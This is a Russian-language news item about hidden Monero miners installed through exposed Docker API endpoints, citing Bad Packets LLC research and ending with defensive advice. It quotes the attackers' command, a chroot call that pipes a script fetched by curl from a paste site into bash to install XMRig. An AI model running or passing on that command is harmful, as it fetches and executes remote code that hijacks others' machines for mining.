28.11.2019 15:40
46

Скрытые майнеры криптовалюты обнаружены в уязвимых контейнерах Docker

В уязвимых контейнерах Docker найдены следы кода скрытых майнеров. Специалисты компании Bad Packets LLC рассказали, что из-за открытых точек API все пользователи оупенсорса рискуют установить на свои устройства вредоносное программное обеспечение в виде джекеров, работающих в фоновом режиме.

Новый троян крадет биткоины

Джекинг в Docker

«Docker является популярной системой развертывания приложений, из-за чего было решено проверить его в первую очередь. Контейнеризация данных часто скрывает от администраторов утилит реальный код во многих сегментах. Контейнеры очень удобны, так как информацией можно легко управлять и переносить на другие сервера, обновлять или масштабировать. В ходе проверки в ряде Docker были обнаружены вредоносные сегменты кода, которые могли стать остаточным явлением после внедрения джекеров», — рассказали специалисты Bad Packets LLC.

В настоящее время хакеры просканировали порядка 59 тысяч IP-сетей. При выявлении уязвимого хоста преступники применяют конечную точку API для запуска ОС Alpine Linux и загрузки Bash.Он выглядит следующим образом:

chroot /mnt /bin/sh -c ‘curl -sL4 http://ix.io/1XQa | bash;

Скрипт устанавливает скрытый майнер XMRRig, который может добывать криптовалюту Monero. По предварительным данным, только за два дня активности хакеры уже получили более 800 долларов при помощи джекинга.

Специалисты Bad Packets LLC рекомендуют всем юзерам Docker тщательнее проверять код и сразу же завершать работу всех не идентифицированных контейнеров. В противном случае они рискуют установить в свои приложения загрузочные скрипты для джекеров.

Ранее сообщалось, что лайткоин пока безуспешно пытается вернуться к значениям выше $50.

Получайте 5 лучших статей дня на Email

Подписаться в Телеграме

Подписка на новости

Простая форма подписки MailerLite!

Пожалуйста, подождите

Вы успешно подписались на рассылку!